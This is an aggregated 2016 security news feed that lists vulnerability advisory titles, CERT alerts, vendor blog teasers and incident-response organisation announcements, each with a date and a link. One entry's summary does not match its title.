https://blog.trailofbits.com/2016/09/27/windows-network-security-now-easier-with-osquery/
Yahoo Password Leak: Your Enterprise Data is at Risk
2016-09-23T09:57:35Z | 1474624655

The media is choke full of reports on a huge Yahoo password leak: 500 million compromised account passwords were hacked nearly 2 years ago. The list of hacked services includes Dropbox, Linkedin, Experian, Anthem, the Office of Personnel Management and many more. A 2-year old password hack may seem minor to IT security professionals. After... The post Yahoo Password Leak: Your Enterprise Data is at Risk appeared first on Cato Networks.

https://www.catonetworks.com/blog/yahoo-password-leak-your-enterprise-data-is-at-risk/
Security Alert (A16-09-06): Multiple vulnerabilities in Apple iTunes for Windows
2016-09-23T04:00:00Z | 1474603200

Apple has released software update fixing eleven vulnerabilities in iTunes for Windows prior to version 12.5.1.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-09-07): Multiple vulnerabilities in OpenSSL
2016-09-23T04:00:00Z | 1474603200

Multiple vulnerabilities are found in the OpenSSL library.

https://www.govcert.gov.hk/en/alerts_detail.php
Avalikustati uus dokumendivahetusprotokoll
2016-09-21T21:00:00Z | 1474491600

Riigi Infosüsteemi Amet avalikustas uue andmevahetusprotokolli DHX, mis võimaldab X-teega liitunud asutustel vahetada dokumente omavahel kiiremini ja lihtsamini.

https://ria.ee/uudised/avalikustati-uus-dokumendivahetusprotokoll
Security Alert (A16-09-05): Multiple Vulnerabilities in Firefox
2016-09-21T04:00:00Z | 1474430400

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-09-04): Vulnerability in Cisco Products
2016-09-20T04:00:00Z | 1474344000

A vulnerability was identified in IKEv1 packet processing code on Cisco IOS, IOS XE and IOS XR Software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-09-03): Multiple vulnerabilities in IBM Notes
2016-09-19T04:00:00Z | 1474257600

Multiple vulnerabilities are found in IBM Lotus Notes related to Apache Xerces-C XML Parser library.

https://www.govcert.gov.hk/en/alerts_detail.php
FIRST CSIRT operations workshop taught in Tehran, I.R. of Iran
2016-09-14T12:55:00Z | 1473857700

A FIRST Computer Security Incident Response Team (CSIRT) operations workshop was taught on September 5th at the International ISC Conference on Information Security & Cryptology (ISCISC2016) at Shahid Beheshti University in Tehran, Islamic Republic of Iran.

https://www.first.org/newsroom/releases/20160914
Security Alert (A16-09-01): Multiple Vulnerabilities in Microsoft Products (September 2016)
2016-09-14T04:00:00Z | 1473825600

Microsoft has released 14 security bulletins. Reports indicate that the vulnerabilities of Internet Explorer and Edge are being actively exploited in wild.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-09-02): Multiple Vulnerabilities in Adobe Flash Player
2016-09-14T04:00:00Z | 1473825600

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by integer overflow, use-after-free error, security bypass and memory corruption.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Windows10 AHCACHE.SYS Remote Denial Of Service
2016-09-13T00:00:00Z | 1473724800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0191
PPA: Riigiportaal teavitab vajadusest uuendada ID-kaarti
2016-09-12T21:00:00Z | 1473714000

Sellest nädalast annab eesti.ee keskkond ID-kaardiga sisse logimisel märku, kui mõne kasutajale väljastatud dokumendi sertifikaadid vajavad uuendamist.

https://ria.ee/uudised/ppa-riigiportaal-teavitab-vajadusest-uuendada-id-kaarti
Customer Case Study: Cloud Migration Drives Global WAN Overhaul
2016-09-12T14:48:33Z | 1473691713

Background J., information technology manager, works for one of the world’s leading manufacturers and marketers of consumer goods. The company has more than 30 manufacturing plants in the Middle East, Europe and the U.S., with offices across the globe. He has more than 20 years of experience in network security and information management, and specializes in enterprise... The post Customer Case Study: Cloud Migration Drives Global WAN Overhaul appeared first on Cato Networks.

https://www.catonetworks.com/blog/customer-case-study-cloud-migration-drives-global-wan-overhaul/
Plug into New York’s Infosec Community
2016-09-12T11:00:35Z | 1473678035

Between the city’s size and the wide spectrum of the security industry, it’s easy to feel lost. Where are ‘your people?’ How can you find talks that interest you? You want to spend your time meeting and networking, not researching your options. So, we put together a directory of all of the infosec gatherings, companies, and […]

https://blog.trailofbits.com/2016/09/12/plug-into-new-yorks-infosec-community/
Kaspersky Anti-Virus Unhandled Windows Messages Denial of Service Vulnerability
2016-09-05T00:00:00Z | 1473033600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0175
FIRST announces Traffic Light Protocol (TLP) version 1.0
2016-08-31T00:00:00Z | 1472601600

The Forum of Incident Response and Security Teams (FIRST) has announced the release of version 1.0 of its consolidated Traffic Light Protocol (TLP).

https://www.first.org/newsroom/releases/20160831
Security Alert (A16-08-08): Multiple Vulnerabilities in IBM Notes and Domino
2016-08-30T04:00:00Z | 1472529600

Multiple vulnerabilities are found in IBM Notes and Domino. The bundled Java virtual machine (JVM) is susceptible to different attacks as listed in the Oracle Critical Patch Update Advisories (July 2016) which could be remotely exploited without authentication.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-08-07): Multiple Vulnerabilities in Apple iOS
2016-08-26T04:00:00Z | 1472184000

Apple has released software update fixing three vulnerabilities in iOS versions prior to iOS 9.3.5. Reports indicate that the vulnerabilities are being exploited in the wild.

https://www.govcert.gov.hk/en/alerts_detail.php
Kaspersky Internet Security KL1 Driver Signal Handler Denial of Service
2016-08-26T00:00:00Z | 1472169600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0169
Kaspersky Internet Security KLIF Driver NtAdjustTokenPrivileges_HANDLER Denial of Service
2016-08-26T00:00:00Z | 1472169600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0167
Kaspersky Internet Security KLIF Driver NtUserCreateWindowEx_HANDLER Denial of Service
2016-08-26T00:00:00Z | 1472169600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0166
Kaspersky Internet Security KLDISK Driver Multiple Kernel Memory Disclosure Vulnerabilities
2016-08-26T00:00:00Z | 1472169600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0168
Firewall as a Service and your biggest network security challenge
2016-08-23T12:58:39Z | 1471957119

We recently held a webinar focused on educating network professionals about Firewall as a Service (FWaaS). At the beginning of this webinar, we asked the audience “what is your biggest challenge running distributed network security today?” Attendees overwhelmingly noted “monitoring and handling of security events” as the top answer, followed by “ongoing support,” and finally “capacity... The post Firewall as a Service and your biggest network security challenge appeared first on Cato Networks.

https://www.catonetworks.com/blog/firewall-as-a-service-your-biggest-network-security-challenge/
Security Alert (A16-08-06): Multiple Vulnerabilities in Cisco Products (August 2016)
2016-08-22T04:00:00Z | 1471838400

Cisco has released three security advisories fixing a number of vulnerabilities in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Management Center.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-08-05): Multiple Vulnerabilities in IBM Notes
2016-08-18T04:00:00Z | 1471492800

IBM has published few security bulletins to address multiple vulnerabilities related to Pixman library, XStream, and IBM Java SDK used in Notes. The bundled Java virtual machine (JVM) is susceptible to different attacks.......

https://www.govcert.gov.hk/en/alerts_detail.php
Create a Single Unified Security Policy for Hybrid Cloud
2016-08-17T12:14:52Z | 1471436092

By Linda Musthaler, Principal Analyst, Essential Solutions In my last article , I talked about the ways that Cato Networks helps to overcome the problems of SaaS cloud sprawl. Now let’s look at the challenges posed by Infrastructure-as-a-Service (IaaS) sprawl. “Cloud sprawl” refers to the problem of an enterprise having so many cloud services in... The post Create a Single Unified Security Policy for Hybrid Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/create-a-single-unified-security-policy-for-hybrid-cloud/
Security Alert (A16-08-04): Vulnerability in Apple iOS
2016-08-16T04:00:00Z | 1471320000

Apple has released software update fixing a vulnerability in iOS versions prior to iOS 9.3.4......

https://www.govcert.gov.hk/en/alerts_detail.php
FIRST announces the Suguru Yamaguchi Fellowship Program
2016-08-11T12:00:00Z | 1470916800

The Forum of Incident Response and Security Teams (FIRST) is announcing it is renaming its Fellowship Program to the “Suguru Yamaguchi Fellowship Program” in honor and in memory of the late Dr. Suguru Yamaguchi, a former member of the Board of Directors for FIRST, from 2011 through 2013.

https://www.first.org/newsroom/releases/20160811
The Capability Maturity of 3rd Generation Deception Technology
2016-08-11T05:24:29Z | 1470893069

Deception in cybersecurity has come a long way from the early days of honeypots. Recent advances in virtualisation and evolving modern attacks have led to a rapidly maturing set of capabilities that organisations must adopt to see value from deception systems.

https://www.smokescreen.io/the-capability-maturity-of-deception-technology/
AB Rockwell Automation MicroLogix 1400 Code Execution Vulnerability
2016-08-11T00:00:00Z | 1470873600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0184
Security Alert (A16-08-03): Multiple Vulnerabilities in Microsoft Products (August 2016)
2016-08-10T04:00:00Z | 1470801600

Microsoft has released 9 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Work For Us: Fall and Winter Internship Opportunities
2016-08-09T11:50:59Z | 1470743459

If you’re studying in a degree program, and you thrive at the intersection of software development and cyber security, you should apply to our fall or winter internship programs. It’s a great way to add paid experience -and a publication- to your resume, and get a taste of what it’s like to work in a commercial […]

https://blog.trailofbits.com/2016/08/09/work-for-us-fall-and-winter-internship-opportunities/
Migrating Apps to the Cloud? Prevent Cloud Sprawl With More Visibility and Control
2016-08-09T09:23:36Z | 1470734616

By Linda Musthaler, principal analyst, Essential Solutions When I wrote about Cato Networks for Network World a few weeks ago, a colleague told me he thought the solution is interesting, but he couldn’t see why an enterprise would want to connect its entire network to the Cato Cloud. I told him I could see several... The post Migrating Apps to the Cloud? Prevent Cloud Sprawl With More Visibility and Control appeared first on Cato Networks.

https://www.catonetworks.com/blog/migrating-apps-to-the-cloud-prevent-cloud-sprawl-with-more-visibility-and-control/
Security Alert (A16-08-02): Multiple Vulnerabilities in Android
2016-08-09T04:00:00Z | 1470715200

Multiple vulnerabilities are found in Android devices built on Qualcomm chipsets called "QuadRooter". An attacker could exploit these vulnerabilities using a malicious app which requires no special permissions.

https://www.govcert.gov.hk/en/alerts_detail.php
Microsoft Windows PDF API Jpeg2000 csiz Remote Code Execution Vulnerability
2016-08-09T00:00:00Z | 1470700800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0170
LexMark Perceptive Document Filters XLS Convert Code Execution Vulnerability
2016-08-06T00:00:00Z | 1470441600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0172
Lexmark Perceptive Document Filters CBFF Code Execution Vulnerability
2016-08-06T00:00:00Z | 1470441600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0185
LexMark Perceptive Document Filters Bzip2 Convert Out of Bounds Write Vulnerability
2016-08-06T00:00:00Z | 1470441600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0173
New World, New Thinking: Why “The Box” Has Got To Go
2016-08-04T08:11:57Z | 1470298317

We are living in an agile world. On-demand, self-service and “just in time” have become standard for the applications and services we use, when and where we want to use them. The Cloud possesses the functionality to create a truly agile enterprise computing platform. This is the main thesis in Tom Nolle’s recent blog, titled... The post New World, New Thinking: Why “The Box” Has Got To Go appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-world-new-thinking-why-the-box-has-got-to-go/
Hancom Hangul HCell CSSValFormat::CheckUnderbar Code Execution Vulnerability
2016-08-04T00:00:00Z | 1470268800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0151
Hancom Hangul Office HShow!NXDeleteLineObj+0x53692 Code Execution Vulnerability
2016-08-04T00:00:00Z | 1470268800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0146
BlueStacks App Player Privilege Escalation Vulnerability
2016-08-04T00:00:00Z | 1470268800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0124
Hancom Hangul Office HShow!NXDeleteLineObj+0x47269 Code Execution Vulnerability
2016-08-04T00:00:00Z | 1470268800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0147
Hancom Hangul HCell OfficeArt Record pConnectionSites and pVertices Code Execution Vulnerability
2016-08-04T00:00:00Z | 1470268800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0149
Hancom Hangul HCell Workbook Table and Pivot Style Code Execution Vulnerability
2016-08-04T00:00:00Z | 1470268800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0148
Hancom Hangul Office HShow!NXDeleteLineObj+0x6960c Code Execution Vulnerability
2016-08-04T00:00:00Z | 1470268800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0145
Hancom Hangul Office HShow!NXDeleteLineObj+0x560cb Code Execution Vulnerability
2016-08-04T00:00:00Z | 1470268800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0144
Hancom Hangul HCell HncChart CFormulaTokenSizeModifier Code Execution Vulnerability
2016-08-04T00:00:00Z | 1470268800

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0150
Security Alert (A16-08-01): Multiple Vulnerabilities in Firefox
2016-08-03T04:00:00Z | 1470196800

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. These vulnerabilities are caused by memory safety bugs in the browser engine, buffer overflow, stack buffer underflow, use-after-free error, integer overflow, and type confusion flaw, etc.

https://www.govcert.gov.hk/en/alerts_detail.php
A fuzzer and a symbolic executor walk into a cloud
2016-08-02T11:50:34Z | 1470138634

Finding bugs in programs is hard. Automating the process is even harder. We tackled the harder problem and produced two production-quality bug-finding systems: GRR, a high-throughput fuzzer, and PySymEmu (PSE), a binary symbolic executor with support for concrete inputs. From afar, fuzzing is a dumb, brute-force method that works surprisingly well, and symbolic execution is […]

https://blog.trailofbits.com/2016/08/02/engineering-solutions-to-hard-program-analysis-problems/
Your tool works better than mine? Prove it.
2016-08-01T11:50:18Z | 1470052218

No doubt, DARPA’s Cyber Grand Challenge (CGC) will go down in history for advancing the state of the art in a variety of fields: symbolic execution, binary translation, and dynamic instrumentation, to name a few. But there is one contribution that we believe has been overlooked so far, and that may prove to be the […]

https://blog.trailofbits.com/2016/08/01/your-tool-works-better-than-mine-prove-it/
Security Alert (A16-07-04): Multiple Vulnerabilities in Apple iOS
2016-07-27T04:00:00Z | 1469592000

Apple has released software update fixing 43 vulnerabilities in iOS versions prior to iOS 9.3.3.

https://www.govcert.gov.hk/en/alerts_detail.php
Firewall as a Service – Beyond the Next Generation Firewall
2016-07-21T09:19:32Z | 1469092772

Next Generation Firewalls and UTMs have been the cornerstone of network security for the past 20 years. Yet, deploying appliances at every remote office, creates multiple challenges for organizations: the capital needed to buy, upgrade and retire hardware solutions and the people required to configure, patch and manage them. IT teams are also seeing an... The post Firewall as a Service – Beyond the Next Generation Firewall appeared first on Cato Networks.

https://www.catonetworks.com/blog/firewall-as-a-service-beyond-the-next-generation-firewall/
Security Alert (A16-07-03): Multiple Vulnerabilities in Oracle Java and Oracle Products (July 2016)
2016-07-21T04:00:00Z | 1469073600

Oracle has released Critical Patch Update Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

hhttps://www.govcert.gov.hk/en/alerts_detail.php
OpenOffice Impress MetaActions Arbitrary Read Write Vulnerability
2016-07-21T00:00:00Z | 1469059200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0051
Oracle OIT IX SDK libvs_pdf Root xref Denial of Service Vulnerabiity
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0099
Oracle OIT IX SDK TIFF file parsing heap buffer overflow
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0104
Oracle OIT IX SDK libvs_pdf arbitrary pointer access
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0101
Oracle OIT libim_gem2 Gem_Text Code Execution Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0162
Oracle OIT IX SDK libvs_pdf FlateDecode Colors Denial of Service Vulnerabiity
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0100
Oracle OIT IX SDK libvs_pdf Size Integer Overflow Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0097
Oracle OIT ContentAccess libvs_mwkd VwStreamSection Code Execution Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0159
Oracle OIT IX SDK libvs_pdf Kids List Information Leak
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0096
Oracle OIT IX SDK GIF ImageWidth Code Execution Vulnerabiity
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0105
Oracle OIT ImageExport libvs_bmp BMP BI_RLE8 Width Code Execution Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0163
Oracle OIT IX SDK TIFF ExtraSamples Code Execution Vulnerabiity
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0103
Oracle OIT IX SDK libvs_pdf Xref Offset Denial of Service Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0102
Oracle OIT libim_psi2 psiparse Code Execution Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0161
Oracle OIT ContentAccess libvs_word Denial of Service Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0156
Oracle OIT ImageExport libvs_bmp BMP BI_RLE8 Width Code Execution Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0160
Oracle OIT ContentAccess libvs_word+63AC Code Execution Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0158
Oracle OIT IX SDK libvs_pdf Tj Operator Denial of Service Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0098
Oracle OIT ContentAccess libvs_mwkd VwStreamReadRecord Memory Corruption Vulnerability
2016-07-19T00:00:00Z | 1468886400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0157
Apple Core Graphics BMP Framework img_decode_read Remote Code Execution Vulnerability
2016-07-18T00:00:00Z | 1468800000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0186
Apple Image I/O API Tiled TIFF Remote Code Execution Vulnerability
2016-07-18T00:00:00Z | 1468800000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0171
Apple Image I/O EXR Color Component Remote Code Execution Vulnerability
2016-07-18T00:00:00Z | 1468800000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0180
Apple Image I/O EXR Compression Remote Code Execution Vulnerability
2016-07-18T00:00:00Z | 1468800000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0181
Apple OS X Scene Kit DAE XML Code Execution Vulnerability
2016-07-18T00:00:00Z | 1468800000

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0183
Firewall-as-a-Service debuts on the Gartner Hype Cycle for Infrastructure Protection
2016-07-13T13:25:11Z | 1468416311

In new research published by Gartner on July 6th, Analyst Jeremy D’Hoinne introduced a new technology segment: Firewall-as-a-Service (FWaaS). As the name suggests, the segment is focused on the migration of on-premise firewalls to the Cloud. Obviously, this market segment is in an early adoption stage, but the analysis suggests the impact on enterprises would... The post Firewall-as-a-Service debuts on the Gartner Hype Cycle for Infrastructure Protection appeared first on Cato Networks.

https://www.catonetworks.com/blog/firewall-as-a-service-debuts-on-the-gartner-hype-cycle-for-infrastructure-protection/
Security Alert (A16-07-01): Multiple Vulnerabilities in Microsoft Products (July 2016)
2016-07-13T04:00:00Z | 1468382400

Microsoft has released 11 security bulletins addressing multiple vulnerabilities which affect several Microsoft products or components

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A16-07-02): Multiple Vulnerabilities in Adobe Flash Player and Adobe Reader/Acrobat
2016-07-13T04:00:00Z | 1468382400

Security updates are released for Adobe Flash Player and Adobe Reader/Acrobat to address multiple vulnerabilities caused by various buffer overflow, use-after-free error, security restrictions bypass, memory corruption/leak, race condition problem, type confusion and stack corruption.

https://www.govcert.gov.hk/en/alerts_detail.php
Why I didn’t catch any Pokemon today
2016-07-12T03:37:27Z | 1468294647

tl;dr While the internet went crazy today, we went fact finding. Here are our notes on Pokemon Go’s permissions to your Google account. Here’s what Jay and I set out to do at around 6pm today: Find what permissions Pokemon Go is actually requesting Investigate what the permissions actually do Replicate the permissions in a test app […]

https://blog.trailofbits.com/2016/07/11/why-i-didnt-catch-any-pokemon-today/
FIRST calls for participants for a new Special Interest Group (SIG) on Malware Analysis
2016-07-11T15:54:00Z | 1468252440

Forum invites stakeholders to get involved in sharing best practice to mitigate malware incidents.

https://www.first.org/newsroom/releases/20160711
Intel HD Graphics Windows Kernel Driver (igdkmd64) Code Execution Vulnerability
2016-07-11T00:00:00Z | 1468195200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0087
Network Security-as-a-Service: beyond the Next Generation Firewall
2016-07-07T09:57:52Z | 1467885472

About 10 years ago, a small startup, Palo Alto Networks, innovated the Next Generation Firewall (NGFW). Existing enterprise firewalls relied on the use of specific ports to apply application security rules. By application, I don’t mean “salesforce.com”. Rather, it is the mostly irrelevant distinction of application protocols such as HTTP, FTP, SSH and the like.... The post Network Security-as-a-Service: beyond the Next Generation Firewall appeared first on Cato Networks.

https://www.catonetworks.com/blog/network-security-as-a-service-beyond-the-next-generation-firewall/
Symantec Norton Security IDSvix86 PE Remote System Denial of Service Vulnerability
2016-07-07T00:00:00Z | 1467849600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0182
CRN Notes Cato Networks as a Top Cloud Security Startup Making its Mark
2016-07-05T13:03:31Z | 1467723811

“Cato’s big idea is to simplify things once again for companies looking to secure their networks. The startup does this by creating what it calls “One Network,” a single global network in the cloud that connects all branch locations, mobile users and infrastructure (both physical and cloud).”– Kyle Alspach, CRN Recently, Kyle Alspach of CRN... The post CRN Notes Cato Networks as a Top Cloud Security Startup Making its Mark appeared first on Cato Networks.

https://www.catonetworks.com/blog/crn-notes-cato-networks-as-a-top-cloud-security-startup/
28th Annual FIRST Conference in Seoul
2016-06-30T16:41:00Z | 1467304860

The Forum of Incident Response and Security Teams (FIRST), a recognized global leader in incident response has successfully finished its 28th Annual Conference, which takes place this June (12th – 18th) in Seoul, South Korea. Co-hosted by the MSIP (Ministry of Science, ICT and Future Planning), KISA (Korea Internet Security Agency) and KrCERT/CC, the conference was held at Conrad Seoul.

https://www.first.org/newsroom/releases/20160630
Security Alert (A16-06-04): Multiple Vulnerabilities in Symantec Products
2016-06-30T04:00:00Z | 1467259200

Apple has released software update fixing 39 vulnerabilities in iOS versions prior to iOS 9.3.2. These vulnerabilities are caused by problems in various iOS components.

https://www.govcert.gov.hk/en/alerts_detail.php
1. juulist peavad riigiasutused tunnustama teiste EL riikide e-allkirju
2016-06-28T21:00:00Z | 1467147600

Vastavalt Euroopa Liidu määrusele (eIDAS) peavad alates juulist Euroopa Liidu riikide e-allkirju tunnustama kõik Eesti riigi- ja omavalitsusasutused ning need eraettevõtted, kes osutavad avalikku teenust.

https://ria.ee/uudised/1-juulist-peavad-riigiasutused-tunnustama-teiste-el-riikide-e-allkirju
Start using the Secure Enclave Crypto API
2016-06-28T11:50:42Z | 1467114642

tl;dr – Tidas is now open source. Let us know if your company wants help trying it out. When Apple quietly released the Secure Enclave Crypto API in iOS 9 (kSecAttrTokenIDSecureEnclave), it allowed developers to liberate their users from the annoyance of strong passwords or OAuth. That is, if the developers could make do without […]

https://blog.trailofbits.com/2016/06/28/start-using-the-secure-enclave-crypto-api/
SAP HANA Migration: Turning your WAN Inside Out
2016-06-27T12:13:42Z | 1467029622

For decades, SAP ERP is at the core of numerous enterprises across multiple verticals. SAP software runs manufacturing, logistics, sales, supply chain and other critical functions, which means availability, performance and scalability are all essential. Yet, maintaining business-critical application infrastructure is not a simple task. To address the challenge of reducing the integration and maintenance... The post SAP HANA Migration: Turning your WAN Inside Out appeared first on Cato Networks.

https://www.catonetworks.com/blog/sap-hana-migration-turning-your-wan-inside-out/
The Document Foundation LibreOffice RTF Stylesheet Code Execution Vulnerability
2016-06-27T00:00:00Z | 1466985600

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0126
It’s time to take ownership of our image
2016-06-23T11:50:59Z | 1466682659

Gloves Goggles Checkered body suits The representation of hackers in stock media spans a narrow band of reality between the laughable and the absurd. It overshadows the fact that lots of hackers are security professionals. They may dress differently, but they serve a critical function in the economy. It’s easy to satirize the way the […]

https://blog.trailofbits.com/2016/06/23/its-time-to-take-ownership-of-our-image/
Network World names Cato Networks to its exclusive list of “hot security startups to watch”
2016-06-23T08:59:12Z | 1466672352

“Kramer’s track record and the growing popularity of cloud-based security services gives Cato a seat in a hot market. The company serves up traditional security platforms – next-generation firewalling, URL filtering, application control, and VPN access – in its cloud. Its willingness to license its technology to other service providers opens up a potentially large... The post Network World names Cato Networks to its exclusive list of “hot security startups to watch” appeared first on Cato Networks.

https://www.catonetworks.com/blog/network-world-names-cato-networks-to-its-exclusive-list-of-hot-security-startups-to-watch/
Kauguuendatavate ID-kaartide ring laieneb
2016-06-21T21:00:00Z | 1466542800

Tänasest on võimalik uuendada ka 2014. aasta oktoobrist 2015. aasta oktoobrini väljastatud ID-kaartidel olevaid sertifikaate.

https://ria.ee/uudised/kauguuendatavate-id-kaartide-ring-laieneb
Pidgin MXIT Table Command Denial of Service Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0134
Pidgin MXIT Avatar Length Memory Disclosure Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0135
Pidgin MXIT Custom Resource Denial of Service Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0138
Pidgin MXIT CP_SOCK_REC_TERM Denial of Service Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0137
Pidgin MXIT Suggested Contacts Memory Disclosure Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0143
Pidgin MXIT Contact Mood Denial of Service Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0141
Pidgin MXIT MultiMX Message Code Execution Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0142
Pidgin MXIT File Transfer Length Memory Disclosure Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0140
Pidgin MXIT read stage 0x3 Code Execution Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0118
Pidgin MXIT get_utf8_string Code Execution Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0120
Pidgin MXIT HTTP Content-Length Buffer Overflow Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0119
Pidgin MXIT mxit_convert_markup_tx Information Leak Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0123
Pidgin MXIT Splash Image Arbitrary File Overwrite Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0128
Pidgin MXIT g_snprintf Multiple Buffer Overflow Vulnerabilities
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0136
Pidgin MXIT Extended Profiles Code Execution Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0139
Pidgin MXIT Markup Command Denial of Service Vulnerability
2016-06-21T00:00:00Z | 1466467200

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0133
Libarchive Rar RestartModel Code Execution Vulnerability
2016-06-19T00:00:00Z | 1466294400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0154
Libarchive mtree parse_device Code Execution Vulnerability
2016-06-19T00:00:00Z | 1466294400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0153
Libarchive 7zip read_SubStreamsInfo Code Execution Vulnerability
2016-06-19T00:00:00Z | 1466294400

https://talosintelligence.com/vulnerability_reports/TALOS-2016-0152
Security Alert (A16-06-03): Multiple Vulnerabilities in Adobe Flash Player
2016-06-17T04:00:00Z | 1466136000

Security updates are released for Adobe Flash Player to address multiple vulnerabilities caused by type confusion, use-after-free problem, buffer overflow, memory corruption and directory search path errors.

https://www.govcert.gov.hk/en/alerts_detail.php
PPA ja RIA sõlmisid koostöökokkuleppe
2016-06-16T21:00:00Z | 1466110800

Politsei- ja Piirivalveameti peadirektor Elmar Vaher ning Riigi Infosüsteemi Ameti peadirektor Taimar Peterkop allkirjastasid koostööleppe, mille eesmärk on läbi koostöö tulemuslikumalt kasutada ametite ressursse ja oskusteavet.

https://ria.ee/uudised/ppa-ja-ria-solmisid-koostookokkuleppe
Gartner identifies deception as a top 10 security technology for 2016
2016-06-15T15:04:50Z | 1466003090

Gartner lists deception as a top 10 cybersecurity technology for 2016

https://www.smokescreen.io/gartner-identifies-deception-as-a-top-10-security-technology-for-2016/
Security Alert (A16-06-02): Multiple Vulnerabilities in Microsoft Products (June 2016)
2016-06-15T04:00:00Z | 1465963200

